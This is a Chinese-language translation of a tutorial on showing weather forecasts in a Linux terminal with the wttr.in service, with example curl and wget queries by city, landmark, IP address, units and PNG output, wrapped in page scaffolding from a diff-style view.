|
||||||
|
|
||||||
|
* **支持多语言位置名称**(查询字符串必须以 Unicode 指定)
|
||||||
|
|
||||||
|
* **支持指定**天气预报显示的语言(它支持超过 50 种语言)
|
||||||
|
|
||||||
|
* **it uses USCS units for queries from the USA and the metric system for the rest of the world** , but you can change this by appending `?u` for USCS, and `?m` for the metric system (SI)
|
||||||
|
* **来自美国的查询使用 USCS 单位用于,世界其他地方使用公制系统**,但你可以通过附加 `?u` 使用 USCS,附加 `?m` 使用公制系统。 )
|
||||||
|
|
||||||
|
* **3 种输出格式:终端的 ANSI,浏览器的 HTML 和 PNG**。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
就像我在文章开头提到的那样,使用 wttr.in,你只需要 cURL 或 Wget,但你也可以
|
||||||
|
|
||||||
|
**在使用 wttr.in 之前,请确保已安装 cURL。**在 Debian、Ubuntu 或 Linux Mint(以及其他基于 Debian 或 Ubuntu 的 Linux 发行版)中,使用以下命令安装 cURL:
|
||||||
|
```
|
||||||
|
sudo apt install curl
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### wttr.in 命令行示例
|
||||||
|
|
||||||
|
获取你所在位置的天气(wttr.in 会根据你的 IP 地址猜测你的位置):
|
||||||
|
```
|
||||||
|
curl wttr.in
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
通过在 `curl` 之后添加 `-4`,强制 cURL 将名称解析为 IPv4 地址(如果你遇到 IPv6 和 wttr.in 问题):
|
||||||
|
```
|
||||||
|
curl -4 wttr.in
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
如果你想检索天气预报保存为 png,**还可以使用 Wget**(而不是 cURL),或者你想这样使用它:
|
||||||
|
```
|
||||||
|
wget -O- -q wttr.in
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
如果相对 cURL 你更喜欢 Wget ,可以在下面的所有命令中用 `wget -O- -q` 替换 `curl`。
|
||||||
|
|
||||||
|
指定位置:
|
||||||
|
```
|
||||||
|
curl wttr.in/Dublin
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
显示地标的天气信息(本例中为艾菲尔铁塔):
|
||||||
|
```
|
||||||
|
curl wttr.in/~Eiffel+Tower
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
获取 IP 地址位置的天气信息(以下 IP 属于 GitHub):
|
||||||
|
```
|
||||||
|
curl wttr.in/@192.30.253.113
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
使用 USCS 单位检索天气:
|
||||||
|
```
|
||||||
|
curl wttr.in/Paris?u
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
如果你在美国,强制 wttr.in 使用公制系统(SI):
|
||||||
|
```
|
||||||
|
curl wttr.in/New+York?m
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
使用 Wget 将当前天气和 3 天预报下载为 PNG 图像:
|
||||||
|
```
|
||||||
|
wget wttr.in/Istanbul.png
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
你可以指定 PNG 名称
|
||||||
|
|
||||||
|
**对于其他示例,请查看 wttr.in [项目页面][2]或在终端中输入:**
|
||||||
|
```
|
||||||
|
curl wttr.in/:help
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.linuxuprising.com/2018/07/display-weather-forecast-in-your.html
|
||||||
|
|
||||||
|
作者:[Logix][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[geekpi](https://github.com/geekpi)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://plus.google.com/118280394805678839070
|
||||||
|
[1]:https://wttr.in/
|
||||||
|
[2]:https://github.com/chubin/wttr.in
|
||||||
|
[3]:https://github.com/chubin/wttr.in#installation
|
||||||
|
[4]:https://github.com/schachmat/wego
|
||||||
|
[5]:https://github.com/chubin/wttr.in#supported-formats
|
Loading…
Reference in New Issue
Block a user